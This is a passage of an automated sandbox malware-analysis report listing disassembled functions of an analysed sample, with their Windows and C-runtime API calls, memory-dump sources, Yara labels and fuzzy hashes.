                              • Part of subcall function 00DB81BC: _malloc.LIBCMT ref: 00DB81C2
                              • Part of subcall function 00DB81BC: _malloc.LIBCMT ref: 00DB81D2
                              • Part of subcall function 00DC9218: __fsopen.LIBCMT ref: 00DC9225
                            • _fseek.LIBCMT ref: 00DB4D43
                              • Part of subcall function 00DC9852: __lock_file.LIBCMT ref: 00DC9861
                              • Part of subcall function 00DC9852: __ftelli64_nolock.LIBCMT ref: 00DC986E
                            • _fseek.LIBCMT ref: 00DB4D5C
                              • Part of subcall function 00DC9BE3: __lock_file.LIBCMT ref: 00DC9C2E
                              • Part of subcall function 00DC9BE3: __fseek_nolock.LIBCMT ref: 00DC9C3E
                            • GetFullPathNameA.KERNEL32(?,00000800,?,00000000), ref: 00DB4D89
                            • _malloc.LIBCMT ref: 00DB4DA3
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _malloc$__lock_file_fseek$FullNamePath__fseek_nolock__fsopen__ftelli64_nolock
                            • String ID:
                            • API String ID: 73014519-0
                            • Opcode ID: 2ac9803391e3108b8e1a8cdaaff6ddf13b37dd0112536b6c77aca21eac72e4f7
                            • Instruction ID: 3b9c2becabbf478ce625b42fb6ed1a2b757b01b161097e1f9a40c70426ec1af6
                            • Opcode Fuzzy Hash: 2ac9803391e3108b8e1a8cdaaff6ddf13b37dd0112536b6c77aca21eac72e4f7
                            • Instruction Fuzzy Hash: 0B419576800208EACF11BBA4CC86FDEBBBCFF04710F14452AF516A7292EA7595549B74
                            Function 00DB4CCD Relevance: 6.1, APIs: 4, Instructions: 143COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00DB81BC: _malloc.LIBCMT ref: 00DB81C2
                              • Part of subcall function 00DB81BC: _malloc.LIBCMT ref: 00DB81D2
                              • Part of subcall function 00DC9218: __fsopen.LIBCMT ref: 00DC9225
                            • _fseek.LIBCMT ref: 00DB4D43
                              • Part of subcall function 00DC9852: __lock_file.LIBCMT ref: 00DC9861
                              • Part of subcall function 00DC9852: __ftelli64_nolock.LIBCMT ref: 00DC986E
                            • _fseek.LIBCMT ref: 00DB4D5C
                              • Part of subcall function 00DC9BE3: __lock_file.LIBCMT ref: 00DC9C2E
                              • Part of subcall function 00DC9BE3: __fseek_nolock.LIBCMT ref: 00DC9C3E
                            • GetFullPathNameA.KERNEL32(?,00000800,?,00000000), ref: 00DB4D89
                            • _malloc.LIBCMT ref: 00DB4DA3
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _malloc$__lock_file_fseek$FullNamePath__fseek_nolock__fsopen__ftelli64_nolock
                            • String ID:
                            • API String ID: 73014519-0
                            • Opcode ID: c3e8423febd3fe34c047ca688e5d44bdcb7f9385b7f33f25835727e774717eee
                            • Instruction ID: 3b9c2becabbf478ce625b42fb6ed1a2b757b01b161097e1f9a40c70426ec1af6
                            • Opcode Fuzzy Hash: c3e8423febd3fe34c047ca688e5d44bdcb7f9385b7f33f25835727e774717eee
                            • Instruction Fuzzy Hash: 0B419576800208EACF11BBA4CC86FDEBBBCFF04710F14452AF516A7292EA7595549B74
                            Function 00DB3F99 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fafee3570bfb1d15ff292a2d921cc4965e0c821b06a38af0948cdc9dafad7173
                            • Instruction ID: 99cb419f186677a8c15d035ed6e42cee133ad7cae13d9ac202bfd31fb049feb8
                            • Opcode Fuzzy Hash: fafee3570bfb1d15ff292a2d921cc4965e0c821b06a38af0948cdc9dafad7173
                            • Instruction Fuzzy Hash: 6D416B72C00509FADF01FBA4DC42DEEBBB9EF44314F14402AF915A2252EB359A55ABB4
                            Function 00DB3F99 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: af96649240ded465450dd14a8d26e84b7427fd6d4892f02dd22057f6578a939a
                            • Instruction ID: 99cb419f186677a8c15d035ed6e42cee133ad7cae13d9ac202bfd31fb049feb8
                            • Opcode Fuzzy Hash: af96649240ded465450dd14a8d26e84b7427fd6d4892f02dd22057f6578a939a
                            • Instruction Fuzzy Hash: 6D416B72C00509FADF01FBA4DC42DEEBBB9EF44314F14402AF915A2252EB359A55ABB4
                            Function 00DBCC6F Relevance: 6.1, APIs: 4, Instructions: 115COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • __time64.LIBCMT ref: 00DBCC7B
                              • Part of subcall function 00DC9E8E: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00DBCB2D,00000000,00000080,?,?,?,00DB13F0,?,00000000,00000000,00000000,00000000), ref: 00DC9E99
                              • Part of subcall function 00DC9E8E: __aulldiv.LIBCMT ref: 00DC9EB9
                            • __time64.LIBCMT ref: 00DBCC96
                            • __time64.LIBCMT ref: 00DBCD26
                            • __time64.LIBCMT ref: 00DBCD8A
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: __time64$Time$FileSystem__aulldiv
                            • String ID:
                            • API String ID: 4218076520-0
                            • Opcode ID: 979b7d82c7253b864d4e79703cfcf7af156ffc855b533e30c36816fd51ffd29f
                            • Instruction ID: 4bc6fab59af33bca0b1863b0636809a6ab3cee5136dddb79eeabc11b9f95f85b
                            • Opcode Fuzzy Hash: 979b7d82c7253b864d4e79703cfcf7af156ffc855b533e30c36816fd51ffd29f
                            • Instruction Fuzzy Hash: 904126B8910384CFC724EFA9E9C25A5BBE4FBA5350724923ED05ACB3A1D3709944DB70
                            Function 00D7C06F Relevance: 6.1, APIs: 4, Instructions: 115COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: __time64$__aulldiv
                            • String ID:
                            • API String ID: 2203630334-0
                            • Opcode ID: 4bdce021f664fb6a8a2a07c26b2a73003d50b7fd43c405f525bd81e189684942
                            • Instruction ID: 9a86604d8792b840932bdbb2b9a5aa746ed2c47b0e9c0e83698e452ccb807288
                            • Opcode Fuzzy Hash: 4bdce021f664fb6a8a2a07c26b2a73003d50b7fd43c405f525bd81e189684942
                            • Instruction Fuzzy Hash: 12415A75810710CFE32ADF69CEC2526B7E0FB8A310794D13EE89DCA262E7B05840DB60
                            Function 00DB7303 Relevance: 6.1, APIs: 4, Instructions: 106sleepCOMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 00DB731D
                            • _memset.LIBCMT ref: 00DB7335
                              • Part of subcall function 00DB8293: htons.WS2_32(?), ref: 00DB82AB
                              • Part of subcall function 00DB7260: GetLastError.KERNEL32(-0000EA60,00000000,?,00DB37B2,?), ref: 00DB727A
                            • Sleep.KERNEL32(000001F4), ref: 00DB73C8
                            • GetLastError.KERNEL32 ref: 00DB73D4
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast_memset$Sleephtons
                            • String ID:
                            • API String ID: 2264653377-0
                            • Opcode ID: 963605eb3a14d657a7d69fca771bcbdd6b63a556e28c08e39e32860723418bfa
                            • Instruction ID: f206063e2d8443a4cbf573a79659aa6c6863925320ec65c2579ae98126b60717
                            • Opcode Fuzzy Hash: 963605eb3a14d657a7d69fca771bcbdd6b63a556e28c08e39e32860723418bfa
                            • Instruction Fuzzy Hash: E931607690431DAEDF11AAE4DC82EEE77BCEF44354F04006AF616A6281EA359A089774
                            Function 00DB7303 Relevance: 6.1, APIs: 4, Instructions: 106sleepCOMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 00DB731D
                            • _memset.LIBCMT ref: 00DB7335
                              • Part of subcall function 00DB7260: GetLastError.KERNEL32(-0000EA60,00000000,?,00DB37B2,?), ref: 00DB727A
                            • Sleep.KERNEL32(000001F4), ref: 00DB73C8
                            • GetLastError.KERNEL32 ref: 00DB73D4
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast_memset$Sleep
                            • String ID:
                            • API String ID: 4288913296-0
                            • Opcode ID: ed3829cd5923d5acf06ec9733b03637165b91a318efad220b3f57f430e8f0cf7
                            • Instruction ID: f206063e2d8443a4cbf573a79659aa6c6863925320ec65c2579ae98126b60717
                            • Opcode Fuzzy Hash: ed3829cd5923d5acf06ec9733b03637165b91a318efad220b3f57f430e8f0cf7
                            • Instruction Fuzzy Hash: E931607690431DAEDF11AAE4DC82EEE77BCEF44354F04006AF616A6281EA359A089774
                            Function 00DD38D8 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00DD390C
                            • __isleadbyte_l.LIBCMT ref: 00DD3940
                            • MultiByteToWideChar.KERNEL32(488D10C4,00000009,00000000,53DC458D,00DE15C0,00000000,?,?,?,00DBC08B,00000000,00DE15C0,00000000), ref: 00DD3971
                            • MultiByteToWideChar.KERNEL32(488D10C4,00000009,00000000,00000001,00DE15C0,00000000,?,?,?,00DBC08B,00000000,00DE15C0,00000000), ref: 00DD39DF
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                            • String ID:
                            • API String ID: 3058430110-0
                            • Opcode ID: 716244ab207ba0279e284591128ac0609098a4792c8eeb8f40b8513e5ef6d592
                            • Instruction ID: 2890352efec7c56df083a6ad7b4cec4dbe27fc690dc3e4bd3de3b65bc53b347b
                            • Opcode Fuzzy Hash: 716244ab207ba0279e284591128ac0609098a4792c8eeb8f40b8513e5ef6d592
                            • Instruction Fuzzy Hash: 3631A23190424AEFDB20DF64C8A5AAD7BA5FF01311F19456AE4A19B391D370DE40DF72
                            Function 00DB6C20 Relevance: 6.1, APIs: 4, Instructions: 96COMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 00DB6C39
                            • GetVersionExA.KERNEL32(?,?,?,00000000), ref: 00DB6C52
                            • SetLastError.KERNEL32(00000005,?,?,00000000), ref: 00DB6C77
                              • Part of subcall function 00DBD320: GetCurrentProcess.KERNEL32(000001B0,?,?,?,?,00DB2023,00000000,000001B0,?,00000000,00000080,?,?,00DB558E,00DE81B0,00000000), ref: 00DBD369
                              • Part of subcall function 00DBD320: VirtualAlloc.KERNEL32(00000000,00DB2023,00003000,00000000,000001B0,?,?,?,?,00DB2023,00000000,000001B0,?,00000000,00000080), ref: 00DBD3CA
                            • SetLastError.KERNEL32(00000006,?,?,00000000), ref: 00DB6CF4
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$AllocCurrentProcessVersionVirtual_memset
                            • String ID:
                            • API String ID: 3952774693-0
                            • Opcode ID: 7da21adc663d3d706e8a67ff40aa4270fbfd502f96806dafcefe7669d246c1d8
                            • Instruction ID: 0a657f9c836f473a110d9c807e17d044dd27879e9c6755598ee909798266ba5c
                            • Opcode Fuzzy Hash: 7da21adc663d3d706e8a67ff40aa4270fbfd502f96806dafcefe7669d246c1d8
                            • Instruction Fuzzy Hash: 2121F732A00314EFD7309E749C42BDB7BE4EB05724F150025E94FA7282EA74D9498BB0
                            Function 00DB6C20 Relevance: 6.1, APIs: 4, Instructions: 96COMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 00DB6C39
                            • GetVersionExA.KERNEL32(?), ref: 00DB6C52
                            • SetLastError.KERNEL32(00000005), ref: 00DB6C77
                              • Part of subcall function 00DBD320: GetCurrentProcess.KERNEL32(000001B0,?,?,?,?,00DB2023,00000000,000001B0,?,00000000,00000080,?,?,00DB558E,00DE81B0,00000000), ref: 00DBD369
                              • Part of subcall function 00DBD320: VirtualAlloc.KERNEL32(00000000,00DB2023,00003000,00000000,000001B0,?,?,?,?,00DB2023,00000000,000001B0,?,00000000,00000080), ref: 00DBD3CA
                            • SetLastError.KERNEL32(00000006), ref: 00DB6CF4
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$AllocCurrentProcessVersionVirtual_memset
                            • String ID:
                            • API String ID: 3952774693-0
                            • Opcode ID: 56e831b719296b6a3aa2dd107392d8ed7a09a6dd2e82f7451b8ea8c783cb5076
                            • Instruction ID: 0a657f9c836f473a110d9c807e17d044dd27879e9c6755598ee909798266ba5c
                            • Opcode Fuzzy Hash: 56e831b719296b6a3aa2dd107392d8ed7a09a6dd2e82f7451b8ea8c783cb5076
                            • Instruction Fuzzy Hash: 2121F732A00314EFD7309E749C42BDB7BE4EB05724F150025E94FA7282EA74D9498BB0
                            Function 00DB7017 Relevance: 6.1, APIs: 4, Instructions: 81synchronizationCOMMON
                            Download Yara Rule
                            APIs
                            • _malloc.LIBCMT ref: 00DB7033
                              • Part of subcall function 00DC87FF: __FF_MSGBANNER.LIBCMT ref: 00DC8822
                              • Part of subcall function 00DC87FF: __NMSG_WRITE.LIBCMT ref: 00DC8829
                              • Part of subcall function 00DC87FF: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,00DD181E,00000000,00000001,00000000,?,00DCA834,00000018,00DE3700,0000000C,00DCA8C5), ref: 00DC8876
                            • htonl.WS2_32(?), ref: 00DB7048
                              • Part of subcall function 00DB7162: PeekNamedPipe.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000080), ref: 00DB7183
                            • WaitForSingleObject.KERNEL32(00000000,00000000,00000000,00000000,00000080), ref: 00DB70AF
                            • _memset.LIBCMT ref: 00DB70E0
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeapNamedObjectPeekPipeSingleWait_malloc_memsethtonl
                            • String ID:
                            • API String ID: 2241902265-0
                            • Opcode ID: b06e1e6090bec903adcce3fe0327fd55a923c88934fab92d3d5b51a4925cb0cb
                            • Instruction ID: 7eda7c9c13baa64cdf41f0c3949c292c0bdb97d06f0825f743b65ae6dd36fd79
                            • Opcode Fuzzy Hash: b06e1e6090bec903adcce3fe0327fd55a923c88934fab92d3d5b51a4925cb0cb
                            • Instruction Fuzzy Hash: 2221C471904201EBDF20BFA99881AEE77B4FF84760F654156FC45AB282EB70CD418775
                            Function 00DB7017 Relevance: 6.1, APIs: 4, Instructions: 81synchronizationCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • _malloc.LIBCMT ref: 00DB7033
                              • Part of subcall function 00DC87FF: __FF_MSGBANNER.LIBCMT ref: 00DC8822
                              • Part of subcall function 00DC87FF: __NMSG_WRITE.LIBCMT ref: 00DC8829
                              • Part of subcall function 00DC87FF: RtlAllocateHeap.NTDLL(00000000,?,?,00004008,00DEFFA0,?,00DB106E,00004008,?,?,?,?,00000003,?,70207369), ref: 00DC8876
                            • htonl.WS2_32(?), ref: 00DB7048
                            • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000000,00000080), ref: 00DB70AF
                            • _memset.LIBCMT ref: 00DB70E0
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeapObjectSingleWait_malloc_memsethtonl
                            • String ID:
                            • API String ID: 3856049160-0
                            • Opcode ID: a9d644d3dc2f5fc706d93fc4146e9f5c02e290d5b4b0abc63994e00a45415a0e
                            • Instruction ID: 7eda7c9c13baa64cdf41f0c3949c292c0bdb97d06f0825f743b65ae6dd36fd79
                            • Opcode Fuzzy Hash: a9d644d3dc2f5fc706d93fc4146e9f5c02e290d5b4b0abc63994e00a45415a0e
                            • Instruction Fuzzy Hash: 2221C471904201EBDF20BFA99881AEE77B4FF84760F654156FC45AB282EB70CD418775
                            Function 00DB32EC Relevance: 6.1, APIs: 4, Instructions: 76synchronizationpipeCOMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 00DB32FF
                            • CreatePipe.KERNEL32(?,?,?,00100000), ref: 00DB3335
                            • GetStartupInfoA.KERNEL32(?), ref: 00DB333F
                            • WaitForSingleObject.KERNEL32(?,00002710), ref: 00DB3383
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateInfoObjectPipeSingleStartupWait_memset
                            • String ID:
                            • API String ID: 468459245-0
                            • Opcode ID: a9f3adcc7b861c043d03ba3a9e601a8231580c7dddd69f40ceceb267d2e173b4
                            • Instruction ID: 79d2c6659b41965294aae56917dc146933c58c7ab724a46bbefdbb8f61c7e47f
                            • Opcode Fuzzy Hash: a9f3adcc7b861c043d03ba3a9e601a8231580c7dddd69f40ceceb267d2e173b4
                            • Instruction Fuzzy Hash: 0A212572C00218FEDB10DFA8DD45ADEBBB9FF48310F100116FA05E6251E7719A058BA1
                            Function 00DB32EC Relevance: 6.1, APIs: 4, Instructions: 76synchronizationpipeCOMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 00DB32FF
                            • CreatePipe.KERNEL32(?,?,?,00100000), ref: 00DB3335
                            • GetStartupInfoA.KERNEL32(?), ref: 00DB333F
                            • WaitForSingleObject.KERNEL32(?,00002710), ref: 00DB3383
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateInfoObjectPipeSingleStartupWait_memset
                            • String ID:
                            • API String ID: 468459245-0
                            • Opcode ID: a5e0a75f24bddbb3a05318d075c0f4a2862b454543c642f9ea8646a79b39ba0c
                            • Instruction ID: 79d2c6659b41965294aae56917dc146933c58c7ab724a46bbefdbb8f61c7e47f
                            • Opcode Fuzzy Hash: a5e0a75f24bddbb3a05318d075c0f4a2862b454543c642f9ea8646a79b39ba0c
                            • Instruction Fuzzy Hash: 0A212572C00218FEDB10DFA8DD45ADEBBB9FF48310F100116FA05E6251E7719A058BA1
                            Function 00D70CD3 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: __vscwprintf_helper_malloc_memset_vswprintf_s_vwprintf
                            • String ID:
                            • API String ID: 2856252058-0
                            • Opcode ID: eccc273c426231604760ca4403401cd5331d21854103d622b5c33626475fdbcf
                            • Instruction ID: 89add50b5b65483f55346bf734faf97b606bbc22bebd71fe6c1ee5d543c136ec
                            • Opcode Fuzzy Hash: eccc273c426231604760ca4403401cd5331d21854103d622b5c33626475fdbcf
                            • Instruction Fuzzy Hash: 9D1160B6805618BFDB12AF94DC42AEE7B6CEF45350F248466F90896141F731EB418BB1
                            Function 00DB113A Relevance: 6.1, APIs: 4, Instructions: 71COMMON
                            Download Yara Rule
                            APIs
                            • _malloc.LIBCMT ref: 00DB114F
                              • Part of subcall function 00DC87FF: __FF_MSGBANNER.LIBCMT ref: 00DC8822
                              • Part of subcall function 00DC87FF: __NMSG_WRITE.LIBCMT ref: 00DC8829
                              • Part of subcall function 00DC87FF: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,00DD181E,00000000,00000001,00000000,?,00DCA834,00000018,00DE3700,0000000C,00DCA8C5), ref: 00DC8876
                              • Part of subcall function 00DB540D: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000,00002000,?,00DB10EF,00000000,?,00002000,?,00002000,?,?,?,00000000), ref: 00DB541F
                            • _memset.LIBCMT ref: 00DB11A4
                            • _memset.LIBCMT ref: 00DB11B3
                            • _memset.LIBCMT ref: 00DB11CA
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _memset$AllocateEnvironmentExpandHeapStrings_malloc
                            • String ID:
                            • API String ID: 2041733451-0
                            • Opcode ID: 95961cdc8f093ef167c24480005794b1cc44fe3a49789948264e781419d38246
                            • Instruction ID: 3ac6de6ed2f3d860b9145c573cdea4246f888749db8fda5a4c557c5a2eab1758
                            • Opcode Fuzzy Hash: 95961cdc8f093ef167c24480005794b1cc44fe3a49789948264e781419d38246
                            • Instruction Fuzzy Hash: B6112675600241FAD7106F388C91FFABF6EDF56390FA80168EA5A83242E6229D05C6B0
                            Function 00DB113A Relevance: 6.1, APIs: 4, Instructions: 71COMMON
                            Download Yara Rule
                            APIs
                            • _malloc.LIBCMT ref: 00DB114F
                              • Part of subcall function 00DC87FF: __FF_MSGBANNER.LIBCMT ref: 00DC8822
                              • Part of subcall function 00DC87FF: __NMSG_WRITE.LIBCMT ref: 00DC8829
                              • Part of subcall function 00DC87FF: RtlAllocateHeap.NTDLL(00000000,?,?,00004008,00DEFFA0,?,00DB106E,00004008,?,?,?,?,00000003,?,70207369), ref: 00DC8876
                            • _memset.LIBCMT ref: 00DB11A4
                            • _memset.LIBCMT ref: 00DB11B3
                            • _memset.LIBCMT ref: 00DB11CA
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _memset$AllocateHeap_malloc
                            • String ID:
                            • API String ID: 1114209484-0
                            • Opcode ID: c57505b9de2bc00d2110a47786fbdc5301356c1408913a7c7451129d276e4819
                            • Instruction ID: 3ac6de6ed2f3d860b9145c573cdea4246f888749db8fda5a4c557c5a2eab1758
                            • Opcode Fuzzy Hash: c57505b9de2bc00d2110a47786fbdc5301356c1408913a7c7451129d276e4819
                            • Instruction Fuzzy Hash: B6112675600241FAD7106F388C91FFABF6EDF56390FA80168EA5A83242E6229D05C6B0
                            Function 00D7053A Relevance: 6.1, APIs: 4, Instructions: 71COMMON
                            Download Yara Rule
                            APIs
                            • _malloc.LIBCMT ref: 00D7054F
                              • Part of subcall function 00D87BFF: __FF_MSGBANNER.LIBCMT ref: 00D87C22
                              • Part of subcall function 00D87BFF: __NMSG_WRITE.LIBCMT ref: 00D87C29
                            • _memset.LIBCMT ref: 00D705A4
                            • _memset.LIBCMT ref: 00D705B3
                            • _memset.LIBCMT ref: 00D705CA
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _memset$_malloc
                            • String ID:
                            • API String ID: 3506388080-0
                            • Opcode ID: cf7bc87be9f6fe12c1cc26451aee5a38676cef1de39d46c13cf468d69783dccd
                            • Instruction ID: a6c28b8898dbaeeb20d750ac69a0d34f0d4d408fd4008f659f1a678a69f3fcac
                            • Opcode Fuzzy Hash: cf7bc87be9f6fe12c1cc26451aee5a38676cef1de39d46c13cf468d69783dccd
                            • Instruction Fuzzy Hash: FC110871510141BAD7116B748C81BBA7F6EDF57364F1441A4E45D93193F322ED04CBB0
                            Function 00DBC8C3 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _memset
                            • String ID:
                            • API String ID: 2102423945-0
                            • Opcode ID: d2f26300ce7d12d3bdc87899327973ccff472c9e84fcad46b992c2f930c2c579
                            • Instruction ID: 8112c20fcde99538b6344e81f40200f7bc05949d68abb5680c58ca3038561aa5
                            • Opcode Fuzzy Hash: d2f26300ce7d12d3bdc87899327973ccff472c9e84fcad46b992c2f930c2c579
                            • Instruction Fuzzy Hash: 49018271101205FADF106A75AC81EEF3E9DFF497A1F049026F90AC6213D6348940DBB1
                            Function 00D7BCC3 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _memset
                            • String ID:
                            • API String ID: 2102423945-0
                            • Opcode ID: 372f1fdea8833eaf01995195b0d1b2ba8c5a0e4fe86fb03d21595e93ee87e65a
                            • Instruction ID: ae9c122f0cd216a317ea04a2372717a69a1c305cf2afbdb832f75e5c0bd95fcf
                            • Opcode Fuzzy Hash: 372f1fdea8833eaf01995195b0d1b2ba8c5a0e4fe86fb03d21595e93ee87e65a
                            • Instruction Fuzzy Hash: DB016D71100224BADB217B718C85FAF3A9DEF4A3B1B14842AF91D9B112EB75C940CBB5
